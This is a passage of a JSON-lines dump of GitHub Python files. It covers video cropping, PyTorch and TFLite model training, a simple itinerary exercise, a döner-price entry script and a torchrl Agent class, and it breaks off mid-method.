int(row.x.values[0] - round((max_w - row.width.values[0])/2))\n y = int(row.y.values[0] - round((max_h - row.height.values[0])/2))\n crop = frame[y:y+max_h,x:x+max_w]\n cv2.imwrite(f'./exports/{filename}/{uuid}/thumbnail.png', crop)\n print('Image Generated!')\n\n evt_video_out = cv2.VideoWriter()\n evt_video_out.open(f'./exports/{filename}/{uuid}/source.webm', fourcc, fps, frameSize=(max_w, max_h))\n\n print(f'Creating video for {uuid} length {len(df_frames) / fps} seconds')\n print(max_h)\n print(max_w)\n print(df.name)\n\n for i, row in enumerate(df_frames.iterrows()):\n frame = round(row[1].time*fps)\n video_in.set(cv2.CAP_PROP_POS_FRAMES, frame)\n\n # calculate the adjusted crop size\n ret, frame = video_in.read()\n x = int(row[1].x - round((max_w - row[1].width)/2))\n y = int(row[1].y - round((max_h - row[1].height)/2))\n crop = frame[y:y+max_h,x:x+max_w]\n\n evt_video_out.write(crop)\n\n # try:\n # if len(df) > 30:\n # stabilized_frame = stabilizer.stabilize_frame(input_frame=crop, border_type='black', smoothing_window=30)\n # if stabilized_frame.sum() > 0:\n # evt_video_out.write(stabilized_frame)\n # else:\n # evt_video_out.write(crop)\n # except Exception as e:\n # print('Stablization Failed')\n # break\n \n print('----------------')\n\n evt_video_out.release()\n\n df_events.groupby('uuid').apply(processTrack)\n\nif __name__ == '__main__':\n processVideo('V3136')","repo_name":"Apthox/AqualyticalBackend","sub_path":"videoProcessor.py","file_name":"videoProcessor.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"28005153119","text":"import pdb\n\nimport numpy as np\nimport os\nimport argparse\nfrom tqdm import tqdm\nimport time\nimport torch\nimport torch.utils.data as data\nimport torch.optim as optim\nimport json\nfrom tensorboardX import SummaryWriter\n\nimport mmint_utils as utils\nimport object_keypoints.config as config\nimport object_keypoints.model_utils as model_utils\n\n\ndef train_model(config_file: str, cuda_id: int = 0, no_cuda: bool = False, verbose: bool = False,\n config_args: dict = None):\n # Read config.\n cfg = utils.load_cfg(config_file)\n\n # If any customization is passed via command line - add in here.\n if config_args is not None:\n cfg = utils.combine_cfg(cfg, config_args)\n\n is_cuda = (torch.cuda.is_available() and not no_cuda)\n device = torch.device(\"cuda:%d\" % cuda_id if is_cuda else \"cpu\")\n\n # Shorthands:\n out_dir = cfg['training']['out_dir']\n lr = cfg['training']['learning_rate']\n print_every = cfg['training']['print_every']\n max_epochs = cfg['training']['epochs']\n min_epochs = cfg['training']['min_epochs']\n max_epochs_without_improving = cfg['training']['max_epochs_without_improving']\n vis_dir = os.path.join(out_dir, 'vis')\n\n # Output + vis directory\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if not os.path.exists(vis_dir):\n os.makedirs(vis_dir)\n logger = SummaryWriter(os.path.join(out_dir, 'logs'))\n\n # Dump config to output directory.\n utils.dump_cfg(os.path.join(out_dir, 'config.yaml'), cfg)\n\n # Create model:\n model = config.get_model(cfg, device=device)\n print(model)\n\n # Setup datasets.\n print('Loading train dataset...')\n train_dataset = config.get_dataset('train', cfg)\n print('Dataset size: %d' % len(train_dataset))\n train_dataloader = data.DataLoader(\n train_dataset,\n batch_size=cfg['training']['batch_size'],\n shuffle=cfg['training']['shuffle'],\n num_workers=16,\n # pin_memory=True\n )\n print('Loading val dataset...')\n validation_dataset = config.get_dataset('val', cfg)\n val_dataloader = data.DataLoader(validation_dataset, batch_size=cfg['training']['val_batch_size'], shuffle=True,\n num_workers=8)\n\n # For vis.\n # vis_dataloader = data.DataLoader(validation_dataset, batch_size=10, shuffle=True)\n # data_vis = next(iter(vis_dataloader))\n\n # Get optimizer (TODO: Parameterize?)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n # Get trainer.\n trainer = config.get_trainer(model, optimizer, cfg, logger, vis_dir, device=device)\n\n # Load model + optimizer if exists.\n model_dict = {\n 'model': model,\n 'optimizer': optimizer,\n }\n model_file = os.path.join(out_dir, 'model.pt')\n load_dict = model_utils.load_model(model_dict, model_file)\n epoch_it = load_dict.get('epoch_it', -1)\n it = load_dict.get('it', -1)\n metric_val_best = load_dict.get('val_loss_best', np.inf)\n epoch_without_improving = 0\n\n # Training loop\n start_time = time.time()\n while True:\n epoch_it += 1\n\n if epoch_it > max_epochs or (epoch_without_improving > max_epochs_without_improving and epoch_it > min_epochs):\n print(\"%s Backing up and stopping training.\" % (\n \"Reached max epochs.\" if epoch_it > max_epochs\n else \"Went %d epochs without improving.\" % epoch_without_improving))\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model.pt'))\n break\n\n if epoch_it > 1:\n end_time = time.time()\n per_epoch_avg = (end_time - start_time) / (epoch_it - 1.0)\n # print(\"Avg per epoch time: \", per_epoch_avg) TODO: Save this information somewhere? Along with total.\n # training time and runs information? Where should this go?\n\n for batch in train_dataloader:\n it += 1\n\n loss = trainer.train_step(batch, it)\n logger.add_scalar('loss', loss, it)\n\n # Print output\n if print_every > 0 and (it % print_every) == 0:\n print('[Epoch %02d] it=%03d, loss=%.4f'\n % (epoch_it, it, loss))\n\n # TODO: Bring back visualization?\n # if visualize_every > 0 and (it % visualize_every) == 0:\n # print('Visualizing.')\n # trainer.visualize(data_vis)\n\n # Validate after each batch.\n print('Validating.')\n val_dict = trainer.validation(val_dataloader, it)\n\n for k, v in val_dict.items():\n if v is not None:\n logger.add_scalar(k, v, epoch_it)\n\n val_loss = val_dict['val_loss']\n if val_loss < metric_val_best:\n epoch_without_improving = 0\n metric_val_best = val_loss\n print('Saving new best model. Loss=%03f' % metric_val_best)\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model_best.pt'))\n else:\n epoch_without_improving += 1\n\n # Backup.\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model.pt'))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train a model.')\n parser.add_argument('config', type=str, help='Path to config file.')\n parser.add_argument('--cuda_id', type=int, default=0, help=\"Cuda device id to use.\")\n parser.add_argument('--no_cuda', action='store_true', help='Do not use cuda.')\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Be verbose.')\n parser.set_defaults(verbose=False)\n parser.add_argument('--config_args', type=json.loads, default=None,\n help='Config elements to overwrite. Use for easy hyperparameter search.')\n args = parser.parse_args()\n\n train_model(args.config, args.cuda_id, args.no_cuda, args.verbose, args.config_args)\n","repo_name":"mvandermerwe/object_keypoints","sub_path":"object_keypoints/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26895963839","text":"from tropical.pydrone import Pydrone\nfrom jnk3_no_ask1 import model\n\npyd = Pydrone(model, 'simulations_ic_jnk3.h5', 1)\nprint('loaded simulations')\npyd.discretize(cpu_cores=20)\nprint('Discretized trajectories')\npyd.cluster_signatures_spectral(species='__s1_c', nclusters=10, cluster_range=True, cpu_cores=20)\nprint('clustered trajectories')\nac = pyd.analysis_cluster\nps = pyd.plot_signatures\n\nprint('Plotting')\nac.plot_cluster_dynamics([1], fig_name='1', norm=True, norm_value=0.05)\n\n# jnk3 monomer\njnk3 = model.monomers['JNK3']\nmkk4 = model.monomers['MKK4']\npattern = mkk4\n\nac.plot_pattern_rxns_distribution(pattern, type_fig='bar', fig_name='bar_{0}'.format(pattern.name))\nac.plot_pattern_rxns_distribution(pattern, type_fig='entropy', fig_name='ent_{0}'.format(pattern.name))\nac.plot_pattern_sps_distribution(pattern, type_fig='bar', fig_name='bar_{0}'.format(pattern.name))\nac.plot_pattern_sps_distribution(pattern, type_fig='entropy', fig_name='ent_{0}'.format(pattern.name))\n\nps.plot_sequences(type_fig='modal', title='modal')\nps.plot_sequences(type_fig='trajectories', title='trajectories')\n","repo_name":"LoLab-MSM/jarm_analysis","sub_path":"run_tropical.py","file_name":"run_tropical.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"565240471","text":"\"\"\"\nFind Itinerary from a given list of tickets\n\nGiven a list of tickets, find itinerary in order using the given list.\n\nExample:\n\nInput:\n\"Cincinatti\" -> \"Boston\"\n\"Philadelphia\" -> \"NYC\"\n\"Hawai\" -> \"Cincinatti\"\n\"NYC\" -> \"Hawai\"\n\nOutput: \nPhiladelphia->NYC, NYC->Hawai, Hawai->Cincinatti, Cincinatti->Boston\n\n\"\"\"\n\ndef finditinerary(l1):\n s = dict(l1)\n l2 = [(x[1],x[0]) for x in l1]\n d = dict(l2)\n src = [each for each in s if each not in d][0]\n res = []\n while len (res) != len (l1):\n res.append([src, s[src]])\n src = s[src]\n \n print (res)\n \n \n \nl1 = [('Cincinatti', 'Boston'), ('Philadelphia', 'NYC'), ('Hawai', 'Cincinatti'), ('NYC', 'Hawai')]\nfinditinerary(l1)\n","repo_name":"Sathish-sbu/Hashing","sub_path":"find_itinerary.py","file_name":"find_itinerary.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39474788637","text":"import argparse\r\nimport tensorflow as tf\r\nassert tf.__version__.startswith('2')\r\nfrom tflite_model_maker import image_classifier\r\nfrom tflite_model_maker.config import ExportFormat\r\nfrom tflite_model_maker.config import QuantizationConfig\r\nfrom tflite_model_maker.image_classifier import DataLoader\r\nfrom tensorflowjs.converters import convert_tf_saved_model\r\n\r\nif __name__ == \"__main__\":\r\n str2bool = lambda str : False if str.lower() == 'false' else True\r\n parser = argparse.ArgumentParser(description = 'model_maker')\r\n parser.add_argument('--input', type = str, default = \"./\", help = \"input dataset path. default: ./\")\r\n parser.add_argument('--output', type = str, default = './', help = 'output model path. default: ./')\r\n parser.add_argument('--epochs', type = int, default = 30, help = 'More epochs could achieve better accuracy until it converges but training for too many epochs may lead to overfitting. 30 by default')\r\n parser.add_argument('--batch_size', type = int, default = 32, help = 'Number of samples to use in one training step. 32 by default')\r\n parser.add_argument('--lr', type = float, default = 0.0005, help = 'Base learning rate. 0.0005 by default')\r\n parser.add_argument('--dropout', type = float, default = 0.3, help = 'The rate for dropout, avoid overfitting. 0.3 by default')\r\n parser.add_argument('--train_whole', type = str2bool, default = 'True', help = 'Boolean, if true, the Hub module is trained together with the classification layer on top. Otherwise, only train the top classification layer. True by default')\r\n parser.add_argument('--use_augmentation', type = str2bool, default = 'True', help = 'Boolean, use data augmentation for preprocessing. True by default.')\r\n parser.add_argument('--split_train', type = int, default = 0.8, help = 'Split train dataset ratio. 0.8 by default')\r\n parser.add_argument('--split_valid', type = int, default = 0.5, help = 'Split valid dataset ratio. 0.5 by default')\r\n parser.add_argument('--shuffle', type = str2bool, default = 'True', help = 'Boolean, whether the data should be shuffled. True by default.')\r\n # 导入数据集\r\n data = DataLoader.from_folder(parser.parse_args().input)\r\n # 数据集划分 训练集80% 测试集10% 验证集10%\r\n train_data, rest_data = data.split(parser.parse_args().split_train)\r\n validation_data, test_data = rest_data.split(parser.parse_args().split_valid)\r\n # 创建模型\r\n model = image_classifier.create(\r\n train_data, \r\n model_spec = image_classifier.ModelSpec(\r\n uri = \"https://hub.tensorflow.google.cn/google/imagenet/mobilenet_v2_050_224/feature_vector/5\",\r\n input_image_shape = [224, 224]\r\n ), \r\n validation_data = validation_data,\r\n epochs = parser.parse_args().epochs,\r\n batch_size = parser.parse_args().batch_size,\r\n learning_rate = parser.parse_args().lr,\r\n dropout_rate = parser.parse_args().dropout,\r\n train_whole_model = parser.parse_args().train_whole,\r\n use_augmentation = parser.parse_args().use_augmentation,\r\n shuffle = parser.parse_args().shuffle,\r\n )\r\n # 模型评估\r\n _, accuracy = model.evaluate(test_data)\r\n print(\"测试集精度: {}\".format(accuracy))\r\n # 模型量化导出\r\n model.export(\r\n with_metadata = False,\r\n export_dir = parser.parse_args().output, \r\n export_format = [ExportFormat.LABEL, ExportFormat.SAVED_MODEL, ExportFormat.TFLITE],\r\n quantization_config = QuantizationConfig(\r\n optimizations = tf.lite.Optimize.DEFAULT,\r\n representative_data = validation_data,\r\n supported_ops = tf.lite.OpsSet.TFLITE_BUILTINS_INT8,\r\n inference_input_type = tf.int8, \r\n inference_output_type = tf.int8)\r\n )\r\n # 模型量化精度\r\n print(\"测试集量化精度: {}\".format(model.evaluate_tflite('model.tflite', data = test_data)['accuracy']))\r\n # 模型转换tfjs格式\r\n convert_tf_saved_model(\"saved_model\", \"tfjs_model\")","repo_name":"FunCodersTeam/ModelMaker","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7530562505","text":"import pandas as pd\nimport webbrowser\nimport os\n\n\nif __name__ == \"__main__\":\n input_file_path = 'munich_doener_df.json'\n doener_df = pd.read_json(input_file_path, lines=True)\n\n \n df_price_file_path = 'munich_doener_df_with_price.json'\n if not os.path.exists(df_price_file_path):\n doener_df.to_json(df_price_file_path, orient='records', lines=True)\n\n num_doeners = len(doener_df)\n\n for idx, place in doener_df.iterrows():\n\n doener_df = pd.read_json(df_price_file_path, lines=True)\n\n place_id = place['place_id']\n maps_url = f\"https://www.google.com/maps/place/?q=place_id:{place_id}\"\n # Open the URL in the default web browser\n webbrowser.open(maps_url)\n print(f\"Döner {idx} out of {num_doeners}: {place['name']}, {place['address']}\")\n price = input(\"Dönerpreis / €:\")\n year = input(\"Jahr:\")\n\n doener_df.at[idx, 'year'] = year\n doener_df.at[idx, 'price'] = price\n\n doener_df.to_json(df_price_file_path, orient='records', lines=True)\n ","repo_name":"Bobo1239/doenerkarte","sub_path":"google_maps_data/doener_entry.py","file_name":"doener_entry.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1740020019","text":"from __future__ import annotations\n\nimport pathlib\nimport warnings\nfrom collections import OrderedDict\nfrom textwrap import indent\nfrom typing import Callable, Dict, Optional, Union, Sequence\n\nimport numpy as np\nimport torch.nn\nfrom torch import nn, optim\n\ntry:\n from tqdm import tqdm\n\n _has_tqdm = True\nexcept ImportError:\n _has_tqdm = False\n\nfrom torchrl.collectors.collectors import _DataCollector\nfrom torchrl.data import (\n ReplayBuffer,\n TensorDictPrioritizedReplayBuffer,\n TensorDictReplayBuffer,\n)\nfrom torchrl.data.tensordict.tensordict import _TensorDict\nfrom torchrl.data.utils import expand_right\nfrom torchrl.envs.common import _EnvClass\nfrom torchrl.envs.transforms import TransformedEnv\nfrom torchrl.envs.utils import set_exploration_mode\nfrom torchrl.modules import reset_noise, TDModuleWrapper\nfrom torchrl.objectives.costs.common import _LossModule\nfrom torchrl.objectives.costs.utils import _TargetNetUpdate\n\nREPLAY_BUFFER_CLASS = {\n \"prioritized\": TensorDictPrioritizedReplayBuffer,\n \"circular\": TensorDictReplayBuffer,\n}\n\nWRITER_METHODS = {\n \"grad_norm\": \"add_scalar\",\n \"loss\": \"add_scalar\",\n}\n\n__all__ = [\"Agent\"]\n\n\nclass Agent:\n \"\"\"A generic Agent class.\n\n An agent is responsible of collecting data and training the model.\n To keep the class as versatile as possible, Agent does not construct any\n of its components: they all must be provided as argument when\n initializing the object.\n To build an Agent, one needs a iterable data source (a `collector`), a\n loss module, an optimizer. Optionally, a recorder (i.e. an environment\n instance used for testing purposes) and a policy can be provided for\n evaluating the training progress.\n\n Args:\n collector (Sequence[_TensorDict]): An iterable returning batches of\n data in a TensorDict form of shape [batch x time steps].\n total_frames (int): Total number of frames to be collected during\n training.\n loss_module (_LossModule): A module that reads TensorDict batches\n (possibly sampled from a replay buffer) and return a loss\n TensorDict where every key points to a different loss component.\n optimizer (optim.Optimizer): An optimizer that trains the parameters\n of the model.\n recorder (_EnvClass, optional): An environment instance to be used\n for testing.\n optim_scheduler (optim.lr_scheduler._LRScheduler, optional):\n learning rate scheduler.\n target_net_updater (_TargetNetUpdate, optional):\n a target network updater.\n policy_exploration (ProbabilisticTDModule, optional): a policy\n instance used for\n\n (1) updating the exploration noise schedule;\n\n (2) testing the policy on the recorder.\n\n Given that this instance is supposed to both explore and render\n the performance of the policy, it should be possible to turn off\n the explorative behaviour by calling the\n `set_exploration_mode('mode')` context manager.\n replay_buffer (ReplayBuffer, optional): a replay buffer for offline\n learning.\n writer (SummaryWriter, optional): a Tensorboard summary writer for\n logging purposes.\n update_weights_interval (int, optional): interval between two updates\n of the weights of a model living on another device. By default,\n the weights will be updated after every collection of data.\n record_interval (int, optional): total number of optimisation steps\n between two calls to the recorder for testing. Default is 10000.\n record_frames (int, optional): number of frames to be recorded during\n testing. Default is 1000.\n frame_skip (int, optional): frame_skip used in the environment. It is\n important to let the agent know the number of frames skipped at\n each iteration, otherwise the frame count can be underestimated.\n For logging, this parameter is important to normalize the reward.\n Finally, to compare different runs with different frame_skip,\n one must normalize the frame count and rewards. Default is 1.\n optim_steps_per_batch (int, optional): number of optimization steps\n per collection of data. An agent works as follows: a main loop\n collects batches of data (epoch loop), and a sub-loop (training\n loop) performs model updates in between two collections of data.\n Default is 500\n batch_size (int, optional): batch size when sampling data from the\n latest collection or from the replay buffer, if it is present.\n If no replay buffer is present, the sub-sampling will be\n achieved over the latest collection with a resulting batch of\n size (batch_size x sub_traj_len).\n Default is 256\n clip_grad_norm (bool, optional): If True, the gradients will be clipped\n based on the total norm of the model parameters. If False,\n all the partial derivatives will be clamped to\n (-clip_norm, clip_norm). Default is `True`.\n clip_norm (Number, optional): value to be used for clipping gradients.\n Default is 100.0.\n progress_bar (bool, optional): If True, a progress bar will be\n displayed using tqdm. If tqdm is not installed, this option\n won't have any effect. Default is `True`\n seed (int, optional): Seed to be used for the collector, pytorch and\n numpy. Default is 42.\n save_agent_interval (int, optional): How often the agent should be\n saved to disk. Default is 10000.\n save_agent_file (path, optional): path where to save the agent.\n Default is None (no saving)\n normalize_rewards_online (bool, optional): if True, the running\n statistics of the rewards are computed and the rewards used for\n training will be normalized based on these.\n Default is `False`\n sub_traj_len (int, optional): length of the trajectories that\n sub-samples must have in online settings. Default is -1 (i.e.\n takes the full length of the trajectory)\n min_sub_traj_len (int, optional): minimum value of `sub_traj_len`, in\n case some elements of the batch contain few steps.\n Default is -1 (i.e. no minimum value)\n selected_keys (iterable of str, optional): a list of strings that\n indicate the data that should be kept from the data collector.\n Since storing and retrieving information from the replay buffer\n does not come for free, limiting the amount of data passed to\n it can improve the algorithm performance. Default is None,\n i.e. all keys are kept.\n\n \"\"\"\n\n # trackers\n _optim_count: int = 0\n _collected_frames: int = 0\n _last_log: dict = {}\n _last_save: int = 0\n _log_interval: int = 10000\n _reward_stats: dict = {\"decay\": 0.999}\n\n def __init__(\n self,\n collector: _DataCollector,\n total_frames: int,\n loss_module: Union[_LossModule, Callable[[_TensorDict], _TensorDict]],\n optimizer: optim.Optimizer,\n recorder: Optional[_EnvClass] = None,\n optim_scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,\n target_net_updater: Optional[_TargetNetUpdate] = None,\n policy_exploration: Optional[TDModuleWrapper] = None,\n replay_buffer: Optional[ReplayBuffer] = None,\n writer: Optional[\"SummaryWriter\"] = None,\n update_weights_interval: int = -1,\n record_interval: int = 10000,\n record_frames: int = 1000,\n frame_skip: int = 1,\n optim_steps_per_batch: int = 500,\n batch_size: int = 256,\n clip_grad_norm: bool = True,\n clip_norm: float = 100.0,\n progress_bar: bool = True,\n seed: int = 42,\n save_agent_interval: int = 10000,\n save_agent_file: Optional[Union[str, pathlib.Path]] = None,\n normalize_rewards_online: bool = False,\n sub_traj_len: int = -1,\n min_sub_traj_len: int = -1,\n selected_keys: Optional[Sequence[str]] = None,\n ) -> None:\n\n # objects\n self.collector = collector\n self.loss_module = loss_module\n self.recorder = recorder\n self.optimizer = optimizer\n self.optim_scheduler = optim_scheduler\n self.replay_buffer = replay_buffer\n self.policy_exploration = policy_exploration\n self.target_net_updater = target_net_updater\n self.writer = writer\n self._params = []\n for p in self.optimizer.param_groups:\n self._params += p[\"params\"]\n\n # seeding\n self.seed = seed\n self.set_seed()\n\n # constants\n self.update_weights_interval = update_weights_interval\n self.optim_steps_per_batch = optim_steps_per_batch\n self.batch_size = batch_size\n self.total_frames = total_frames\n self.frame_skip = frame_skip\n self.clip_grad_norm = clip_grad_norm\n self.clip_norm = clip_norm\n if progress_bar and not _has_tqdm:\n warnings.warn(\n \"tqdm library not found. Consider installing tqdm to use the Agent progress bar.\"\n )\n self.progress_bar = progress_bar and _has_tqdm\n self.record_interval = record_interval\n self.record_frames = record_frames\n self.save_agent_interval = save_agent_interval\n self.save_agent_file = save_agent_file\n self.normalize_rewards_online = normalize_rewards_online\n self.sub_traj_len = sub_traj_len\n self.min_sub_traj_len = min_sub_traj_len\n self.selected_keys = selected_keys\n\n def save_agent(self) -> None:\n _save = False\n if self.save_agent_file is not None:\n if (self._collected_frames - self._last_save) > self.save_agent_interval:\n self._last_save = self._collected_frames\n _save = True\n if _save:\n torch.save(self.state_dict(), self.save_agent_file)\n\n def load_from_file(self, file: Union[str, pathlib.Path]) -> Agent:\n loaded_dict: OrderedDict = torch.load(file)\n\n # checks that keys match\n expected_keys = {\n \"env\",\n \"loss_module\",\n \"_collected_frames\",\n \"_last_log\",\n \"_last_save\",\n \"_optim_count\",\n }\n actual_keys = set(loaded_dict.keys())\n if len(actual_keys.difference(expected_keys)) or len(\n expected_keys.difference(actual_keys)\n ):\n raise RuntimeError(\n f\"Expected keys {expected_keys} in the loaded file but got\"\n f\" {actual_keys}\"\n )\n self.collector.load_state_dict(loaded_dict[\"env\"])\n self.model.load_state_dict(loaded_dict[\"model\"])\n for key in [\n \"_collected_frames\",\n \"_last_log\",\n \"_last_save\",\n \"_optim_count\",\n ]:\n setattr(self, key, loaded_dict[key])\n return self\n\n def set_seed(self):\n seed = self.collector.set_seed(self.seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n def state_dict(self) -> Dict:\n state_dict = OrderedDict(\n env=self.collector.state_dict(),\n loss_module=self.loss_module.state_dict(),\n _collected_frames=self._collected_frames,\n _last_log=self._last_log,\n _last_save=self._last_save,\n _optim_count=self._optim_count,\n )\n return state_dict\n\n def load_state_dict(self, state_dict: Dict) -> None:\n model_state_dict = state_dict[\"loss_module\"]\n env_state_dict = state_dict[\"env\"]\n self.loss_module.load_state_dict(model_state_dict)\n self.collector.load_state_dict(env_state_dict)\n\n @property\n def collector(self) -> _DataCollector:\n return self._collector\n\n @collector.setter\n def collector(self, collector: _DataCollector) -> None:\n self._collector = collector\n\n def train(self):\n if self.progress_bar:\n self._pbar = tqdm(total=self.total_frames)\n self._pbar_str = OrderedDict()\n\n collected_frames = 0\n for i, batch in enumerate(self.collector):\n if self.selected_keys:\n batch = batch.select(*self.selected_keys, \"mask\")\n\n if \"mask\" in batch.keys():\n current_frames = batch.get(\"mask\").sum().item() * self.frame_skip\n else:\n current_frames = batch.numel() * self.frame_skip\n collected_frames += current_frames\n self._collected_frames = collected_frames\n\n if self.replay_buffer is not None:\n if \"mask\" in batch.keys():\n batch = batch[batch.get(\"mask\").squeeze(-1)]\n else:\n batch = batch.reshape(-1)\n reward_training = batch.get(\"reward\").mean().item()\n batch = batch.cpu()\n self.replay_buffer.extend(batch)\n else:\n if \"mask\" in batch.keys():\n reward_training = batch.get(\"reward\")\n mask = batch.get(\"mask\").squeeze(-1)\n reward_training = reward_training[mask].mean().item()\n else:\n reward_training = batch.get(\"reward\").mean().item()\n\n if self.normalize_rewards_online:\n reward = batch.get(\"reward\")\n self._update_reward_stats(reward)\n\n if collected_frames > self.collector.init_random_frames:\n self.steps(batch)\n self._collector_scheduler_step(i, current_frames)\n\n self._log(reward_training=reward_training)\n if self.progress_bar:\n self._pbar.update(current_frames)\n self._pbar_description()\n\n if collected_frames > self.total_frames:\n break\n\n self.collector.shutdown()\n\n @torch.no_grad()\n def _update_reward_stats(self, reward: torch.Tensor) -> None:\n decay = self._reward_stats.get(\"decay\", 0.999)\n sum = self._reward_stats[\"sum\"] = (\n decay * self._reward_stats.get(\"sum\", 0.0) + reward.sum()\n )\n ssq = self._reward_stats[\"ssq\"] = (\n decay * self._reward_stats.get(\"ssq\", 0.0) + reward.pow(2).sum()\n )\n count = self._reward_stats[\"count\"] = (\n decay * self._reward_stats.get(\"count\", 0.0) + reward.numel()\n )\n\n mean = self._reward_stats[\"mean\"] = sum / count\n var = self._reward_stats[\"var\"] = ssq / count - mean.pow(2)\n self._reward_stats[\"std\"] = var.clamp_min(1e-6).sqrt()\n\n def _normalize_reward(self, tensordict: _TensorDict) -> None:\n reward = tensordict.get(\"reward\")\n reward = reward - self._reward_stats[\"mean\"]\n reward = reward / self._reward_stats[\"std\"]\n tensordict.set_(\"reward\", reward)\n\n def _collector_scheduler_step(self, step: int, current_frames: int):\n \"\"\"Runs entropy annealing steps for exploration, policy weights update\n across workers etc.\n\n \"\"\"\n\n if self.policy_exploration is not None and hasattr(\n self.policy_exploration, \"step\"\n ):\n self.policy_exploration.step(current_frames)\n\n if step % self.update_weights_interval == 0:\n self.collector.update_policy_weights_()\n\n def steps(self, batch: _TensorDict) -> None:\n average_grad_norm = 0.0\n average_losses = None\n\n self.loss_module.apply(reset_noise) # TODO: group in loss_module.reset?\n self.loss_module.reset()\n\n for j in range(self.optim_steps_per_batch):\n self._optim_count += 1\n if self.replay_buffer is not None:\n sub_batch = self.replay_buffer.sample(self.batch_size)\n else:\n sub_batch = self._sub_sample_batch(batch)\n\n if self.normalize_rewards_online:\n self._normalize_reward(sub_batch)\n\n sub_batch_device = sub_batch.to(self.loss_module.device)\n losses_td = self.loss_module(sub_batch_device)\n if isinstance(self.replay_buffer, TensorDictPrioritizedReplayBuffer):\n self.replay_buffer.update_priority(sub_batch_device)\n\n # sum all keys that start with 'loss_'\n loss = sum(\n [item for key, item in losses_td.items() if key.startswith(\"loss\")]\n )\n loss.backward()\n if average_losses is None:\n average_losses: _TensorDict = losses_td.detach()\n else:\n for key, item in losses_td.items():\n val = average_losses.get(key)\n average_losses.set(key, val * j / (j + 1) + item / (j + 1))\n\n grad_norm = self._grad_clip()\n average_grad_norm = average_grad_norm * j / (j + 1) + grad_norm / (j + 1)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n self._optim_schedule_step()\n\n if self._optim_count % self.record_interval == 0:\n self.record()\n\n if self.optim_steps_per_batch > 0:\n self._log(\n grad_norm=average_grad_norm,\n optim_steps=self._optim_count,\n **average_losses,\n )\n\n def _optim_schedule_step(self) -> None:\n \"\"\"Runs scheduler steps, target network update steps etc.\n Returns:\n \"\"\"\n if self.optim_scheduler is not None:\n self.optim_scheduler.step()\n if self.target_net_updater is not None:\n self.target_net_updater.step()\n\n def _sub_sample_batch(self, batch: _TensorDict) -> _TensorDict:\n \"\"\"Sub-sampled part of a batch randomly.\n\n If the batch has one dimension, a random subsample of length\n self.bach_size will be returned. If the batch has two or more\n dimensions, it is assumed that the first dimension represents the\n batch, and the second the time. If so, the resulting subsample will\n contain consecutive samples across time.\n \"\"\"\n\n if batch.ndimension() == 1:\n return batch[torch.randperm(batch.shape[0])[: self.batch_size]]\n\n sub_traj_len = self.sub_traj_len if self.sub_traj_len > 0 else batch.shape[1]\n if \"mask\" in batch.keys():\n # if a valid mask is present, it's important to sample only\n # valid steps\n traj_len = batch.get(\"mask\").sum(1).squeeze()\n sub_traj_len = max(\n self.min_sub_traj_len,\n min(sub_traj_len, traj_len.min().int().item()),\n )\n else:\n traj_len = (\n torch.ones(batch.shape[0], device=batch.device, dtype=torch.bool)\n * batch.shape[1]\n )\n len_mask = traj_len >= sub_traj_len\n valid_trajectories = torch.arange(batch.shape[0])[len_mask]\n\n batch_size = self.batch_size // sub_traj_len\n traj_idx = valid_trajectories[\n torch.randint(\n valid_trajectories.numel(), (batch_size,), device=batch.device\n )\n ]\n\n if sub_traj_len < batch.shape[1]:\n _traj_len = traj_len[traj_idx]\n seq_idx = (\n torch.rand_like(_traj_len, dtype=torch.float)\n * (_traj_len - sub_traj_len)\n ).int()\n seq_idx = seq_idx.unsqueeze(-1).expand(-1, sub_traj_len)\n elif sub_traj_len == batch.shape[1]:\n seq_idx = torch.zeros(\n batch_size, sub_traj_len, device=batch.device, dtype=torch.long\n )\n else:\n raise ValueError(\n f\"sub_traj_len={sub_traj_len} is not allowed. Accepted values \"\n f\"are in the range [1, {batch.shape[1]}].\"\n )\n\n seq_idx = seq_idx + torch.arange(sub_traj_len, device=seq_idx.device)\n td = batch[traj_idx].clone()\n td = td.apply(\n lambda t: t.gather(\n dim=1,\n index=expand_right(seq_idx, (batch_size, sub_traj_len, *t.shape[2:])),\n ),\n batch_size=(batch_size, sub_traj_len),\n )\n if \"mask\" in batch.keys() and not td.get(\"mask\").all():\n raise RuntimeError(\"Sampled invalid steps\")\n return td\n\n def _grad_clip(self) -> float:\n if self.clip_grad_norm:\n gn = nn.utils.clip_grad_norm_(self._params, self.clip_norm)\n else:\n gn = sum([p.grad.pow(2).sum() for p in self._params]).sqrt()\n nn.utils.clip_grad_value_(self._params, self.clip_norm)\n return float(gn)\n\n def _log(self, **kwargs) -> None:\n 